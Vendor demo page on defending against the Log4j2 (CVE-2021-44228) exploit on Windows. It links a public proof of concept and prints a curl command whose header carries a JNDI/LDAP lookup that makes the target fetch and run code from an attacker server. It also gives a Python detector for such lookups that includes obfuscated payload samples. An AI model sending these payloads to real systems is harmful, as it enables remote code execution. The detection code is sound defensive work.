
SentinelOne vs Apache Log4j2 (CVE-2021-44228) – Windows

Watch SentinelOne protect against the Log4j2 post-exploitation attempts. In this Windows demo, we used a publicly available POC with a weaponized malicious PowerShell script as the post-exploit payload. Read more on our blog to learn more and stay protected.

CVE-2021-44228: Staying Secure – Apache Log4j Vulnerability

Spotted exploit attempts in the wild thus far have led to commodity crypto miner payloads or other known and commodity post-exploitation methods. SentinelOne expects further opportunistic abuse by a wide variety of attackers, including ransomware and nation-state actors.

Potential attack vectors that are covered by the Singularity XDR platform include various post-exploitation frameworks such as Cobalt Strike, Empire, and Metasploit, the usage of post-exploitation tools such as Mimikatz and BloodHound, as well as ransomware attacks and cryptominer activity.

PoC Reference: https://archive.org/details/github.com-tangxiaofeng7-CVE-2021-44228-Apache-Log4j-Rce_-_2021-12-11_07-40-15

The PoC used in the SentinelOne video is based on the above PoC. This same code can be used to spawn a variety of code on the targeted endpoint. In this case, we utilized a malicious PowerShell script (launched via .bat).

The tangxiaofeng7 (public) proof-of-concept code is utilized to stage the ‘malicious’ LDAP environment and respond to the appropriate client queries/traffic.

The exploit is delivered to the target host via curl:

curl 192.168.xxx.xxx:8080 -H 'X-Api-Version: ${jndi:ldap://192.168.xxx.xxx:1389/STRING}'

With the LDAP destination nested in the curl request, the target host reaches out to the attack server, resulting in the attacker's staged code being executed (in the case of this demo, explorer.exe c:\temp\run.bat).
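As an added example (not code from the page or from SentinelOne), here is a small detector a defender can run over request headers or access-log lines to flag the JNDI lookup string shown in the curl command above. It goes beyond the page's single case by first collapsing the nested-lookup obfuscations (`${lower:..}`, `${upper:..}`, `${..:-default}`) that are commonly used to hide the literal "jndi"; the log lines are constructed samples.

```python
import re

# Log4j lookup forms used to obscure "jndi" or the scheme name:
#   ${lower:J} -> "j", ${upper:n} -> "N", ${env:UNSET:-j} -> "j", ${::-j} -> "j"
_OBFUSCATION = re.compile(
    r"\$\{(?:lower|upper):([^${}]*)\}"        # case-change lookups
    r"|\$\{[^${}:]*:[^${}]*:-([^${}]*)\}",    # default-value form ${x:y:-default}
    re.IGNORECASE)

# A resolved JNDI lookup: ${jndi:<scheme>:[//]<target>}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:(?://)?([^}]*)\}", re.IGNORECASE)


def normalize(s: str) -> str:
    """Collapse nested/obfuscating lookups until the string stops changing."""
    def repl(m):
        if m.group(1) is not None:                      # ${lower:..} / ${upper:..}
            return m.group(1).lower() if m.group(0)[2:7].lower() == "lower" else m.group(1).upper()
        return m.group(2)                                # ${x:y:-default} -> default
    prev = None
    while prev != s:
        prev, s = s, _OBFUSCATION.sub(repl, s)
    return s


def find_jndi_lookups(text: str):
    """Return (scheme, target) for every JNDI lookup found after de-obfuscation."""
    return [(m.group(1).lower(), m.group(2)) for m in _JNDI.finditer(normalize(text))]


# Constructed access-log lines (hypothetical; not from the demo). Line 1 mirrors the
# header from the curl command above, line 3 carries an obfuscated variant.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Dec/2021:07:40:15 +0000] "GET / HTTP/1.1" 200 512 "-" "curl/7.68.0" '
    '"X-Api-Version: ${jndi:ldap://192.168.xxx.xxx:1389/STRING}"',
    '10.0.0.7 - - [11/Dec/2021:07:41:02 +0000] "GET /login HTTP/1.1" 200 123 "-" "Mozilla/5.0" "-"',
    '10.0.0.9 - - [11/Dec/2021:07:42:30 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}${upper:n}di:${::-l}dap://203.0.113.9:1389/x}" "-"',
]


def scan_log(lines):
    """Return (line_number, scheme, target) for each line containing a JNDI lookup."""
    return [(n, scheme, target)
            for n, line in enumerate(lines, 1)
            for scheme, target in find_jndi_lookups(line)]


if __name__ == "__main__":
    for n, scheme, target in scan_log(SAMPLE_LOG):
        print(f"line {n}: JNDI lookup via {scheme} -> {target}")
```

Pair a hit with an outbound-connection alert from the same host to the extracted target to confirm the lookup actually fired rather than merely arrived.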

Watch our Linux demo here: https://youtu.be/vkboEtF0bAg
